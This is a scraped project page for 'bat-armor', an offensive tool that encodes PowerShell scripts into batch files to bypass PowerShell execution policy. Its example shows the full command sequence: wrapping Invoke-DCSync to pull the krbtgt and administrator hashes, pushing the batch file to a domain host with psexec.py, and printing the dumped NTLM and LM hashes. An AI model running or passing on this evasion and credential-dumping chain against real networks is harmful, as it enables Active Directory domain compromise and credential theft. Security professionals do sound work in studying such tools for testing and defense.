Need help with bat-armor?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

klsecservices
129 Stars 48 Forks MIT License 5 Commits 0 Opened issues

Description

Encode powershell payload into bat files

Services available

!
?

Need anything else?

Contributors list

Bat Armor

Bypass PowerShell execution policy by encoding ps script into bat file.

Example

Run Invoke-DCSync.ps1 to get krbtgt hash:

$ python bat_armor.py --script-path Invoke-DCSync.ps1\
--launch-string "Invoke-DCSync -users krbtgt,administrator -alldata"\
--out krbtgt.bat --target-filepath 'c:\windows\krbtgt.bat'

$ python psexec.py pentesto.loc/[email protected] -c krbtgt.bat
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies

...

Hash NTLM: b8aa706788a3d8c6ac9a96684d7ff330
ntlm- 0: b8aa706788a3d8c6ac9a96684d7ff330
lm - 0: 6829621ea2044b0e931f83e0b62b4b8c

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.